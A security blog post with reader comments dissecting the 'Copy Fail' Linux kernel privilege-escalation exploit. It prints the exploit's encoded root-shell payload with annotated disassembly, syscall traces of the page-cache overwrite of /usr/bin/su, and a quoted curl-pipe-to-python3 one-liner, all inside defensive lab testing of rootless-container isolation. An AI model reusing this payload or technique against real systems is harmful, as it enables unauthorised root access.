The dedicated website: https://copy.fail
In the previous post about SELinux MCS and GitLab runners, I briefly mentioned CVE-2026-31431 (“Copy Fail”) as a motivating example for per-job VM isolation. After that post went out I spent the weekend setting up a lab to actually run the exploit, trace it at the syscall level, and verify that the rootless Podman architecture we deploy on GNOME’s runners would contain it. This post documents the entire process: from disassembling the shellcode to watching the kernel reject the privilege escalation in real time.
For a full technical breakdown of the root cause, the scatterlist mechanics, and the disclosure timeline, read Theori’s excellent writeup at xint.io/blog/copy-fail-linux-distributions. In this post we’ll first analyze the shellcode embedded in the public exploit, then set up a lab to run it inside a rootless container and trace what happens at the kernel level.
In the days following the disclosure I noticed a lot of people running the exploit on their systems without bothering to check what the shellcode actually does. Executing a compressed binary blob from a GitHub repository you have never audited is not a great security practice — for all you know it could be exfiltrating data or dropping a backdoor alongside the privilege escalation. So before running anything, let’s look at what the actual shellcode contains.
The shellcode is embedded in the Python exploit as a compressed and hex-encoded string:
78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a
154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56
c3ff593611fcacfa499979fac5190c0c0c0032c310d3
The script uses zlib.decompress() to turn this into raw bytes. To extract and inspect the payload:
#!/usr/bin/env python3
import zlib

hex_str = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
compressed_bytes = bytes.fromhex(hex_str)
raw_payload = zlib.decompress(compressed_bytes)

with open("shellcode.bin", "wb") as f:
    f.write(raw_payload)

print(f"Payload extracted: {len(raw_payload)} bytes")
Running file on the extracted binary confirms what we expect:
shellcode.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked...
This is not raw shellcode — it is a fully formed ELF executable. The exploit overwrites the beginning of /usr/bin/su with this tiny binary. When the OS executes su, it loads the corrupted pages from the page cache and runs the malicious ELF instead of the legitimate utility.
The standard objdump -d shellcode.bin produces no output because the exploit author used a technique called ELF golfing — stripping the Section Headers to compress the payload down to a few dozen bytes. Without a .text section, objdump gives up. To force raw disassembly:
objdump -D -b binary -m i386:x86-64 shellcode.bin
The first ~0x77 bytes are ELF header data that objdump tries to interpret as assembly, producing nonsensical add %al,(%rax) instructions. The actual code begins at offset 0x78. Here is the full disassembly with annotations:
The setuid(0) syscall (offsets 0x78 to 0x7e):
78: 31 c0 xor %eax,%eax
7a: 31 ff xor %edi,%edi
7c: b0 69 mov $0x69,%al
7e: 0f 05 syscall
xor %eax, %eax clears rax, which is what allows the single-byte mov into %al to work later. xor %edi, %edi sets rdi to 0 — the first argument for the syscall. mov $0x69, %al loads 105 (decimal), which is the Linux x86-64 syscall number for setuid. The syscall instruction executes setuid(0).
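As a quick sanity check, the stub can be reassembled byte-for-byte in Python. This is just a sketch — the byte values are copied straight from the listing above:

```python
# The setuid(0) stub, reassembled from the annotated disassembly.
stub = bytes([
    0x31, 0xC0,  # xor %eax,%eax - clear rax so only the low byte needs setting
    0x31, 0xFF,  # xor %edi,%edi - first argument (uid) = 0
    0xB0, 0x69,  # mov $0x69,%al - syscall number
    0x0F, 0x05,  # syscall
])
print(len(stub), stub[5])  # 8 bytes total; 0x69 == 105 == __NR_setuid on x86-64
```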
The execve("/bin/sh") syscall (offsets 0x80 to 0x8d):
80: 48 8d 3d 0f 00 00 00 lea 0xf(%rip),%rdi
87: 31 f6 xor %esi,%esi
89: 6a 3b push $0x3b
8b: 58 pop %rax
8c: 99 cltd
8d: 0f 05 syscall
lea 0xf(%rip), %rdi is a RIP-relative load — it looks 15 bytes ahead of the current instruction pointer, which lands exactly at offset 0x96, the start of the /bin/sh string. xor %esi, %esi sets argv to NULL. The push $0x3b / pop %rax sequence is a golfing trick to load 59 (execve) in fewer bytes than mov rax, 59. cltd sign-extends eax into edx, zeroing the third argument (envp) with a single byte. The final syscall executes execve("/bin/sh", NULL, NULL).
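The RIP-relative arithmetic is easy to double-check: on x86-64, RIP points at the *next* instruction when the displacement is added. A small verification sketch (not part of the exploit):

```python
lea_offset = 0x80    # where the lea instruction starts
lea_length = 7       # 48 8d 3d 0f 00 00 00
displacement = 0x0f  # little-endian disp32 taken from the last four opcode bytes

# target = address of the NEXT instruction + displacement
target = lea_offset + lea_length + displacement
print(hex(target))  # 0x96 - the offset of the /bin/sh string
```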
The clean exit (offsets 0x8f to 0x94):
8f: 31 ff xor %edi,%edi
91: 6a 3c push $0x3c
93: 58 pop %rax
94: 0f 05 syscall
If execve somehow fails, the payload calls exit(0) (syscall 60) rather than crashing.
The hardcoded string (offsets 0x96 to 0x9d):
96: 2f (bad)
97: 62 69 6e 2f 73 (bad)
9c: 68 .byte 0x68
9d: 00 00 add %al,(%rax)
objdump marks these as (bad) because it is trying to decode data as instructions. Converting the hex bytes 2f 62 69 6e 2f 73 68 00 to ASCII yields /bin/sh\0 — the null-terminated string that the lea instruction at offset 0x80 points to.
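Decoding those bytes by hand confirms the string — a one-liner sketch using the byte values from the listing:

```python
# The trailing data bytes from offsets 0x96-0x9d of the payload.
data = bytes([0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x73, 0x68, 0x00])
string = data.rstrip(b"\x00").decode("ascii")
print(string)  # /bin/sh
```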
To reproduce the vulnerability I provisioned a Fedora 43 VM using virt-install. The kernel I had installed was 6.17.1-300.fc43.x86_64, which predates the fix entirely — the patch was backported into the stable 6.19.x tree starting with 6.19.12, so the entire 6.17.x line is vulnerable.
virt-install \
--name cve-2026-31431 \
--vcpus 4 \
--memory 4096 \
--disk path=/var/lib/libvirt/images/cve-2026-31431.qcow2,size=20,bus=virtio,format=qcow2 \
--network bridge=virbr0,model=virtio \
--location 'https://download.fedoraproject.org/pub/fedora/linux/releases/43/Everything/x86_64/os/' \
--initrd-inject=/tmp/vm.ks \
--extra-args="inst.ks=file:/vm.ks console=ttyS0,115200n8" \
--graphics none
On the Fedora VM, I configured rootless Podman following the same patterns we use on GNOME’s GitLab runners — a dedicated podman system user with linger enabled, pasta for networking (the modern replacement for slirp4netns), and a large Sub-UID/Sub-GID allocation.
dnf install -y podman
useradd -m podman
usermod --add-subuids 100000-165535 --add-subgids 100000-165535 podman
loginctl enable-linger podman
su - podman -c 'podman run --rm alpine echo "Rootless Podman is working!"'
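The subordinate range above gives the podman user 65,536 extra IDs to hand out inside namespaces. A sketch of how such an /etc/subuid-style entry is interpreted (the helper name is mine, not a real tool):

```python
def subid_range(line):
    """Parse a 'user:start:count' entry into (user, first_id, last_id)."""
    user, start, count = line.strip().split(":")
    first = int(start)
    last = first + int(count) - 1
    return user, first, last

# The range configured with usermod above.
print(subid_range("podman:100000:65536"))  # ('podman', 100000, 165535)
```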
Running strace inside a container requires two overrides: --cap-add=SYS_PTRACE (container runtimes drop this capability by default) and --security-opt seccomp=unconfined (the default seccomp profile blocks ptrace). Without both, strace will fail immediately with PTRACE_TRACEME: Operation not permitted.
I downloaded copy_fail_exp.py into a local directory beforehand — the /vuln mount in the command below points to that directory. Worth noting: I also saw people running the exploit via curl https://copy.fail/exp | python3 && su directly, which is just as reckless as running the shellcode without inspecting it first. Always download, read, and understand what you are about to execute.
From the host VM as the podman user:
podman run --rm -it \
--cap-add=SYS_PTRACE \
--security-opt seccomp=unconfined \
-v $(pwd):/vuln:Z \
-w /vuln \
fedora:43 bash
Inside the container, I installed strace, created an unprivileged test user, and ran the exploit:
dnf install -y strace python3 util-linux
useradd testuser
cp /root/copy_fail_exp.py /home/testuser
chown testuser:testuser /home/testuser/copy_fail_exp.py
su - testuser -c "strace -f -e trace=socket,bind,setsockopt,sendmsg,splice,execve,setuid -o python_trace.txt python3 copy_fail_exp.py"
The strace output captured the exact mechanism by which the vulnerability corrupts the page cache. The exploit loops over the shellcode payload, writing it four bytes at a time into the in-memory cache of /usr/bin/su:
169 socket(AF_ALG, SOCK_SEQPACKET|SOCK_CLOEXEC, 0) = 4
169 bind(4, {sa_family=AF_ALG, salg_type="aead", salg_feat=0, salg_mask=0,
salg_name="authencesn(hmac(sha256),cbc(aes))"}, 88) = 0
169 setsockopt(4, SOL_ALG, ALG_SET_KEY, "\10\0\1\0...", 40) = 0
169 setsockopt(4, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4) = 0
169 sendmsg(5, {msg_iov=[{iov_base="AAAA\177ELF", iov_len=8}]}, MSG_MORE) = 8
169 splice(3, [0], 7, NULL, 4, 0) = 4
169 splice(6, NULL, 5, NULL, 4, 0) = 4
Step by step:
- The socket(AF_ALG, ...) call opens the kernel’s userspace cryptographic API, available to unprivileged users by default.
- bind selects authencesn(hmac(sha256),cbc(aes)), the specific cipher whose ESN scratch write triggers the bug.
- sendmsg delivers an 8-byte message. The first four bytes (AAAA) are padding; the next four (\177ELF) are the data to write — the start of the ELF header. In later iterations, different 4-byte chunks of the shellcode are sent (e.g., iov_base="AAAA1\3001\377").
- splice() transfers page cache pages of /usr/bin/su into the crypto socket’s buffer without copying to userspace. The kernel’s authencesn scratch write then deposits those four bytes from sendmsg directly into the page cache, bypassing file permissions entirely.

This pattern repeats dozens of times until the entire malicious ELF payload is staged into the page cache. At the end:
170 execve("/usr/sbin/su", ["su"], 0x559f5d7fbe50 /* 22 vars */) = 0
170 execve("/bin/sh", NULL, NULL) = 0
The script executes su, which loads from the corrupted page cache and runs the malicious payload instead of the legitimate binary.
The exploit successfully overwrote /usr/bin/su in the page cache, executed the shellcode, and escalated to root inside the container — the prompt changed to [root@ce307d49e132 testuser]# and setuid(0) returned success. But that root is contained by User Namespace UID mappings.
Rootless Podman relies on Linux User Namespaces. When you start a rootless container, Podman creates a user namespace in which the container’s internal UID space is mapped to unprivileged UIDs on the host. The kernel allows setuid(0) to succeed because UID 0 inside the namespace is a valid identity — but it is mapped to an unprivileged host user. As we verify in the uid_map proof section below, container root (UID 0) maps directly to UID 1000 on the host — the podman user account. The exploit’s “root” shell has no more host-level privilege than that unprivileged user.
There is a complication with using strace to observe the setuid(0) rejection. When ptrace is attached to a process that executes a SUID binary, the kernel triggers a secureexec transition and temporarily suspends event reporting to prevent an unprivileged debugger from hijacking a potentially privileged process. The setuid(0) call happens during this blindspot, so strace misses it.
To watch the kernel reject the call without debugger interference, I used bpftrace on the host. eBPF hooks into the kernel tracepoint directly and is not subject to the ptrace restrictions:
bpftrace -e '
tracepoint:syscalls:sys_enter_setuid /comm == "su"/ {
printf("Process %d (%s) attempting setuid(%d)...\n", pid, comm, args->uid);
}
tracepoint:syscalls:sys_exit_setuid /comm == "su"/ {
printf("...Kernel responded with: %d\n", args->ret);
}'
With this running on the host, I executed the exploit inside the container both with and without strace. The bpftrace output captured all the runs:
Process 27122 (su) attempting setuid(0)...
...Kernel responded with: -1
Process 27419 (su) attempting setuid(0)...
...Kernel responded with: 0
The -1 response (EPERM) corresponds to the run where strace was attached: with ptrace active on a process executing a SUID binary, the kernel preemptively strips the SUID privileges, so the setuid(0) call is denied.
The 0 response corresponds to the native run without strace. The exploit succeeded — setuid(0) returned success and the prompt changed to [root@ce307d49e132 testuser]#. But this is root inside the container, which — as the User Namespace mapping proves below — is just UID 1000 on the host. The exploit achieved full privilege escalation within the container’s namespace, but the namespace boundary prevented it from meaning anything on the host.
The final piece of evidence comes from the kernel’s UID mapping table. Inside the rootless container:
cat /proc/self/uid_map
0 1000 1
1 100000 65536
65537 524288 65536
The first line is the critical one: 0 1000 1 means UID 0 (root) inside the container is mapped to UID 1000 on the host — my unprivileged podman user. The remaining lines map subordinate UID ranges allocated on the host, including the 100000–165535 range we configured earlier.
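The translation itself is mechanical. A sketch of how the kernel walks uid_map rows of (inside-start, host-start, count) — my own helper, written only to illustrate the arithmetic:

```python
def to_host_uid(container_uid, uid_map):
    """Translate a container UID to a host UID via uid_map rows (inside, host, count)."""
    for inside, host, count in uid_map:
        if inside <= container_uid < inside + count:
            return host + (container_uid - inside)
    raise ValueError(f"UID {container_uid} is unmapped")

# The first two rows of the uid_map shown above.
uid_map = [(0, 1000, 1), (1, 100000, 65536)]
print(to_host_uid(0, uid_map))     # 1000 - container root is the podman user
print(to_host_uid(1000, uid_map))  # 100999 - an ordinary in-container user
```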
Confirming from the host side by running sleep 100 inside the container and checking the host process table:
podman 27943 0.0 0.0 2984 2028 pts/1 S+ 22:15 0:00 sleep 100
The process is owned by podman, not root. Even with a root prompt inside the container, every action is constrained to what UID 1000 can do on the host. The exploit’s “root” shell cannot modify host system files, cannot access /etc/shadow, cannot interact with host processes — it is trapped within the User Namespace boundary.
Rootless containers handled this container escape scenario as expected. The exploit obtained root inside the container, but User Namespace UID mappings ensured that root was just my unprivileged podman user on the host. The page cache write worked, the shellcode executed, setuid(0) returned success — and none of it mattered outside the namespace boundary. This is exactly the kind of scenario rootless architectures were designed for, and it is why we run GNOME’s GitLab runners this way, at least for now, until we look deeper into ephemeral microVMs via Cloud Hypervisor + fleeting-plugin-fleetingd.
For those running OpenShift, I would highly suggest enabling User Namespace support for pods. User Namespaces were made GA starting from OpenShift 4.20 and provide the same UID mapping isolation we demonstrated here with rootless Podman — container root maps to an unprivileged host user, which means kernel LPEs like Copy Fail cannot escape the pod boundary even when the exploit itself succeeds.
Edit 1 (May 5, 2026): While rootless containers prevent the attacker from escalating to host root, the page cache is still shared across the host. Containers that re-use the same base image layers share the same cached pages for those layers — if a malicious CI job corrupts a binary in the page cache, other containers launched from that same image could end up executing the poisoned version. This breaks container-to-container isolation to some extent without ever needing to escape to the host.
If we weren’t already looking into moving away from containers completely into ephemeral microVMs, one area I’d invest in would be replicating what CargoWall does for GitHub Actions in GitLab CI. At that point, even if an attacker gained access to a container and modified a binary with specific instructions — like reading environment variables and sending them to an external server — the modified binary would not be able to exfiltrate credentials or fetch malware, because DNS queries would be intercepted by eBPF and routed through a CoreDNS proxy.
That said, I still think rootless containers raise the attack complexity well beyond a one-liner. Exploiting the shared page cache scenario requires understanding additional details about the underlying host: what container images and shared image layers are present, whether those images contain setuid binaries, and whether other CI jobs explicitly call those binaries during their build process.
However, Copy Fail can be used in many other ways that are not contained by containers or the settings above. For example, it can modify /etc/ssl/certs to prepare for MitM attacks. If multiple containers are based on the same image, one compromised CA set affects the others.
Couldn't you then simply re-run the exploit as the unprivileged podman user and gain root on the host?
But… does this escape the container? If not (the author seems to indicate it does not) then does it matter if you are in Docker or rootless Podman, right, since the end result is always: you have elevated to root within the container. If the rest of the container filesystem isolation does its job, the end result is the same? Though I guess another chained exploit to escape the container would be worse in Docker? Do I have that right?
1. I would hope the default seccomp policy blocks AF_ALG in these containers. I bet it doesn’t. Oh well.
2. The write-to-RO-page-cache primitive STILL WORKED! It’s just that the particular exploit used had no meaningful effect in the already-root-in-a-container context. If you think you are safe, you’re probably wrong. All you need to make a new exploit is an fd representing something that you aren’t supposed to be able to write. This likely includes CoW things where you are supposed to be able to write after CoW but you aren’t supposed to be able to write to the source.
So:
- Are you using these containers with a common image, or even a common layer in an image, to isolate dangerous workloads from each other? Oops, they can modify the image layers and corrupt each other. There goes any sort of cross-tenant isolation.
- What if you get an fd backed by the zero page and write to it? This can’t result in anything that the administrator would approve of.
- What if you ro-bind-mount something in? It’s not ro any more.
I added

AmbientCapabilities=CAP_NET_BIND_SERVICE
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
NoNewPrivileges=yes

to my .service. Is it good enough?

If you can orchestrate a container escape from the container's "root", then you're on to something.
“ While rootless containers prevent the attacker from escalating to host root, the page cache is still shared across the host. Containers that re-use the same base image layers share the same cached pages for those layers — if a malicious CI job corrupts a binary in the page cache, other containers launched from that same image could end up executing the poisoned version.”
Oh, and this [2] just happened
[1] https://github.com/containers/oci-seccomp-bpf-hook/pull/209 [2] https://github.com/moby/moby/pull/52501
echo -e 'install algif_aead /bin/false\n' > /etc/modprobe.d/disable-algif.conf
That just prevents the faulty module from loading, so you have time to fix it properly (kernel upgrade). Technically there should be zero impact — the very few tools that use it will fall back to userspace. I haven't even found that module loaded in our infrastructure.
Then check if it is loaded, and if it is, unload it or reboot.
There is no reason it would be default policy. Otherwise you might as well block every socket and just multiplex everything over stdin/stdout.
I see a lot of projects blocking those sockets in containers as a response to this exploit, but it seems rather strange to me. We're disabling a cryptographic performance feature entirely because there was a security bug in it that one time? It's a rather weird default to use. It's not like we mass-disable kernel modules every time someone discovers an EoP bug, is it? Did we blacklist OpenSSL's binaries after Heartbleed?
I suppose it makes sense as a default on vulnerable kernels (though people running vulnerable kernels should put effort into patching rather than workarounds in my opinion), but these defaults are going to be around ten years from now when copy.fail is a distant memory.
Although using this to justify their migration to micro-VMs is very strange to me. Sure for this CVE it would have been better, but surely for a future attack it could hit a component shared across VMs but not containers? Are people really choosing technology based on CVE-of-the-week?
You may be on to something…
share and enjoy!
The need for this feature/functionality in the first place is questioned by some:
> As someone who works on the Linux kernel's cryptography code, the regularly occurring AF_ALG exploits are really frustrating. AF_ALG, which was added to the kernel many years ago without sufficient review, should not exist. It's very complex, and it exposes a massive attack surface to unprivileged userspace programs. And it's almost completely unnecessary, as userspace already has its own cryptography code to use. The kernel's cryptography code is just for in-kernel users (for example, dm-crypt).
> The algorithm being used in this [specific] exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API. […]
* https://news.ycombinator.com/item?id=47952181#unv_47956312
To my knowledge, not many things were using the in-kernel code anyway; the recommended way is to use userland tools...
It's optional for openssl, systemd apparently needs it, but deleting the module from one of my systems didn't cause any issues. /shrug
I would have thought they provide better isolation than using multiple users which is the traditional security boundary.
It might depend on what you mean by a container. Are sandboxes such as Bubblewrap and Firejail containers?
But I am disappointed that we still don't have a clear OpenSSL successor; there is nothing to be salvaged from this mess of a project
It is easy for security scanners to scan a Linux system, but will they inspect your containers, and snaps, and flatpaks, and VMs? It is easy for DevOps to ssh into your Linux server, but can they also get logged in to each container, and do useful things? Your patches and all dependencies are up-to-date on your server, but those containers are still dragging around legacy dependencies, by design. Is your backup system aware of containers and capable of creating backup images or files, that are suitable for restoring back to service?
Yes, the syscall API is (famously) stable, but the drivers, for example, are such a mess that many non-Linux projects prefer to take BSD drivers for e.g. WiFi despite them supporting far fewer devices (even if the Linux ones would be license compatible).
Does this increase complexity? Yes, it does. Is it worth the cost? Depends on each individual case IMO.
VMs are considered vastly better because the surface area where exploits can happen is smaller and/or better isolated within the kernel.
If you are arguing the latter is not true — and we are all collectively hand-waving away a big chunk of the surface area, so that may be the case — it would help to be explicit about why you believe an exploit in that area is similarly likely.